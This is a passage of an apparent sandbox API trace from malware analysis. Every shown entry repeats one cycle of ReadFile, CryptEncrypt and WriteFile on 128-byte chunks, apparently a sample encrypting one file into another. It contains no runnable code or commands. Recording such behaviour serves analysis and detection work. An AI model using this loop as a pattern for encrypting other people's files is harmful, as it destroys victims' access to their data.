lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.271] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.271] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.271] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.271] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.271] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.271] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.271] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.271] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.271] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.272] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.272] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.272] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.272] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.272] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.272] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.272] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.272] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.272] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.272] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.272] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.272] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.272] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.272] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.272] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.272] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.272] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.272] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.272] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.272] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.272] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.272] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.272] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.272] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.273] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.273] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.273] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.273] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.273] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.273] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.273] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.273] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.273] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.273] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.273] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.273] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.273] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.273] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.273] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.273] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.273] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.273] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.274] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.274] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.274] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.274] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.274] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.274] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.274] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.274] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.274] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.274] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.274] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.274] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.274] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.274] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.274] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.274] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.274] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.274] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.274] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.274] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.274] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.274] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.274] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.274] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.275] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.275] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.275] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.275] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.275] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.275] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.275] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.275] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.275] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.275] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.275] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.275] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.275] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.275] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.275] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.275] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.275] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.275] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.275] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.275] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.275] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.275] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.275] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.275] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.276] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.276] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.276] WriteFile (in: hFile=0xd4, lpBuffer=0x37aad0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesWritten=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.276] ReadFile (in: hFile=0xd8, lpBuffer=0x37aad0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x1cf988, lpOverlapped=0x0 | out: lpBuffer=0x37aad0*, lpNumberOfBytesRead=0x1cf988*=0x80, lpOverlapped=0x0) returned 1 [0041.276] CryptEncrypt (in: hKey=0x37bd80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80, dwBufLen=0x100 | out: pbData=0x37aad0*, pdwDataLen=0x1cf988*=0x80) returned 1 [0041.276] WriteFile (in: hFile=0xd4, 